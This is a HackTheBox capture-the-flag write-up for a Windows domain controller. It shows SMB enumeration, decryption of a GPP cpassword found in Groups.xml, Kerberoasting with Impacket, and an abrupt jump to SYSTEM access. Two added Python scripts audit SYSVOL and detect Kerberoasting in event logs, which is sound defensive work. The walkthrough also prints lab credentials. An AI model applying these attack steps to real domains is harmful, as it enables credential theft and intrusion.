We always start with an nmap scan.

```
nmap -sC -sV -oA nmap <Target-IP>
```

```
# Nmap 7.91 scan initiated Fri Jul 2 05:11:00 2021 as: nmap -sC -sV -oA nmap 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.39s latency).
Not shown: 981 closed ports
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
82/tcp    filtered xfer
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-02 12:13:11Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
2383/tcp  filtered ms-olap4
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h00m56s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-02T12:14:16
|_  start_date: 2021-07-02T04:37:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 2 05:13:37 2021 -- 1 IP address (1 host up) scanned in 157.11 seconds
```
This is a Windows box, and my first one on HackTheBox. There are a lot of open ports (DNS, Kerberos, LDAP, SMB: this is a domain controller), so I started my enumeration on the SMB port to check whether anonymous login is allowed.

```
smbclient -L //10.10.10.100/ -N
```
I also decided to use smbmap to check which of the shares we actually have access to.

```
smbmap -H 10.10.10.100
```
It seems we have read permission on the Replication share, so let's use smbclient to log in to it.

```
smbclient //10.10.10.100/Replication -N
```
Going through all the files in the share, I found something interesting: a file with credentials stored in it.

I did some research on the Groups.xml file I got from the SMB share.
Groups.xml is a Group Policy Preference (GPP) file. GPP was introduced with the release of Windows Server 2008 and allows the configuration of domain-joined computers through policy. A dangerous feature of GPP was the ability to save usernames and passwords in the preference files. While the passwords were encrypted with AES, the key was made publicly available, so the encryption protects nothing.

So if we manage to compromise any domain account, we can simply grab the Groups.xml file from SYSVOL and decrypt the passwords in it.
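The defender's side of this finding is an audit of SYSVOL for any preference item that still carries a `cpassword` attribute. The script below is an added example, not part of the original write-up or of any tool it uses: it parses GPP XML with the standard library, reports every element that stores an encrypted credential together with the account it belongs to, and generalises beyond Groups.xml to the other preference files that use the same attribute (ScheduledTasks.xml, Services.xml, Drives.xml, DataSources.xml, Printers.xml). The sample Groups.xml is constructed to mirror the one found on this box (the cpassword value and the SVC_TGS account come from the write-up; the other attributes are assumptions). It deliberately does not decrypt anything; knowing that a `cpassword` exists is enough to act on.

```python
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# GPP files that can carry a cpassword attribute on their Properties element.
GPP_FILES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "Drives.xml", "DataSources.xml", "Printers.xml"}

# The attribute naming the account differs per file type (userName in Groups.xml,
# runAs in ScheduledTasks.xml, accountName in Services.xml, username in DataSources.xml).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

# Constructed sample: a Groups.xml shaped like the one on the Replication share.
# The second item has an empty cpassword and must not be reported.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="active.htb\SVC_TGS"/>
  </User>
  <User name="active.htb\helpdesk" image="2" changed="2018-07-18 20:50:00">
    <Properties action="D" cpassword="" userName="active.htb\helpdesk"/>
  </User>
</Groups>
"""


@dataclass
class Finding:
    item: str       # enclosing preference item tag: User, Task, NTService, Drive, ...
    account: str    # account whose password is stored
    action: str     # GPP action code (C/R/U/D) of the item
    cpassword: str  # the AES-encrypted, base64-encoded value as stored


def find_cpasswords(xml_text: str) -> List[Finding]:
    """Return every element in a GPP XML document that stores a non-empty cpassword."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    # ElementTree has no parent pointers; build a child -> parent map once.
    parent = {child: node for node in root.iter() for child in node}
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:                      # attribute absent or empty: nothing stored
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "<unknown>")
        item = parent.get(elem, root).tag
        findings.append(Finding(item, account, elem.get("action", "?"), cpw))
    return findings


def audit_sysvol(sysvol_root: str) -> List[tuple]:
    """Walk a SYSVOL copy (or any directory) and return (path, Finding) pairs for
    every GPP file that still carries stored credentials."""
    results = []
    for dirpath, _, filenames in os.walk(sysvol_root):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8-sig") as fh:
                try:
                    for f in find_cpasswords(fh.read()):
                        results.append((path, f))
                except ET.ParseError:
                    pass                  # malformed file; worth a manual look
    return results


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"[!] {f.item} item (action {f.action}) stores a password for {f.account}: "
              f"cpassword={f.cpassword[:12]}...")
```

Running it against a mounted or copied SYSVOL (`audit_sysvol(r"/mnt/sysvol")`) lists every stored credential by account, which is exactly the list of passwords that should be rotated and the policy items that should be deleted; the patch that removed the ability to create new `cpassword` entries did not remove existing ones.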
Now that we know we are on the right track, let's hit it. We have a username and a password, but the password is encrypted, so let's find a way to decrypt it.

```
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
```

gpp-decrypt ships with Kali; it is a simple Ruby script that decrypts a given GPP-encrypted string using the published key.
We now have valid credentials to access the machine: username SVC_TGS, password GPPstillStandingStrong2k18. Since we know we are working on an Active Directory machine, we can use these credentials to query the domain controller for a ticket.
Now let's try a technique known as Kerberoasting. Kerberoasting is one of the most common attacks against Active Directory domains. It works by requesting Kerberos service tickets and then cracking the encrypted portion of those tickets offline with brute force.

If you compromise a user that has a valid Kerberos ticket-granting ticket (TGT), you can request one or more ticket-granting service (TGS) tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server shown in the above figure.

A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore you can run an offline brute-force attack on the encrypted portion to recover the service account password. So if you request a TGS ticket for an SPN registered to an administrator account and the administrator is using a weak password, we'll be able to crack it!
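The same property that makes Kerberoasting work also makes it visible: every service ticket request is logged on the domain controller as Security event 4769 (once the "Kerberos Service Ticket Operations" audit subcategory is enabled), and tooling of this kind typically asks for RC4 (etype 0x17) tickets because that is the cheapest hash to crack, while AES (0x11/0x12) tickets for machine accounts are the normal background. The Python below is an added example, not part of the write-up or of Impacket: it runs a simple detection over constructed 4769 records reduced to the fields the check needs, flagging successful RC4 ticket requests for SPNs that belong to user accounts (machine accounts and krbtgt have long random keys and are not worth alerting on), grouped by requesting account and source address. The account names mirror the box; the IP addresses and the `jdoe` user are constructed, and one record carries status 0x25 (KRB_AP_ERR_SKEW) to show that a request rejected for clock skew, as in this write-up, is excluded from the count.

```python
from collections import defaultdict
from typing import Dict, Iterable, List

# TicketEncryptionType values as logged in Event ID 4769.
RC4_HMAC = "0x17"
AES_TYPES = {"0x11", "0x12"}   # AES128 / AES256-CTS-HMAC-SHA1-96: the expected modern default

# Constructed sample 4769 records (a Kerberos service ticket was requested).
# Only the fields the check uses are kept; 192.0.2.x addresses are placeholders.
SAMPLE_4769: List[dict] = [
    # normal: TGT holder asking for the DC's own service, AES
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "192.0.2.10", "Status": "0x0"},
    # suspicious: RC4 ticket for an SPN held by the Administrator user account
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.10", "Status": "0x0"},
    # normal: machine account renewing against the KDC
    {"TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.100", "Status": "0x0"},
    # normal: a user reaching the same service with an AES ticket
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x12", "IpAddress": "192.0.2.20", "Status": "0x0"},
    # rejected for clock skew (KRB_AP_ERR_SKEW): no ticket was issued, so not counted
    {"TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.30", "Status": "0x25"},
]


def is_user_account_spn(service_name: str) -> bool:
    """Machine accounts end in '$' and krbtgt is the KDC itself; their keys are random
    and long, so tickets for them are not a cracking target."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def is_suspicious_tgs_request(ev: dict) -> bool:
    """Successful (Status 0x0) RC4 service ticket for a user-account SPN."""
    return (ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and is_user_account_spn(ev.get("ServiceName", "")))


def kerberoast_candidates(events: Iterable[dict], threshold: int = 1) -> Dict[str, List[str]]:
    """Group suspicious requests by requester (account + source IP) and return those
    that obtained RC4 tickets for at least `threshold` distinct user-account services.
    threshold=1 suits a domain where AES is enforced; raise it where legacy services
    legitimately still negotiate RC4 and only bulk requests are anomalous."""
    seen: Dict[str, set] = defaultdict(set)
    for ev in events:
        if is_suspicious_tgs_request(ev):
            key = f'{ev["TargetUserName"]} from {ev["IpAddress"]}'
            seen[key].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    for requester, services in kerberoast_candidates(SAMPLE_4769).items():
        print(f"[!] possible Kerberoasting by {requester}: RC4 tickets for {', '.join(services)}")
```

The check is intentionally narrow: in a domain where RC4 has been removed from `msDS-SupportedEncryptionTypes` on service accounts, a single RC4 service ticket is already an anomaly, and the corresponding hardening (AES-only service accounts with long, random or managed passwords) is what removes the attack surface the write-up exploits.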
Now it's time for us to use Impacket. It can easily be installed with the commands below:

```
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
python setup.py install   # install the package
```
Once the install is done we will be using the `GetUserSPNs.py` script, so let's locate it and run it with the credentials we have.

```
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
```

And boom, we were able to request a TGS ticket for an SPN registered to the Administrator account.
If you get this error on Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`, it is because of your local time (the nmap scan already reported a clock skew of about 3 hours). You need to synchronise your host with the DC:

```
ntpdate <IP of DC>
```
Now that we have the hash, let's crack it using John the Ripper; save the hash in a file named

We have credentials for Administrator now, so let's use psexec.py to get access through the SMB share.
We are SYSTEM, so let's go get the flags lol.

Now let's get the Administrator flag.

We are done. Damn, it's right, actually my first Windows machine. More to come, and I'll keep updating.

Greetings from Muzec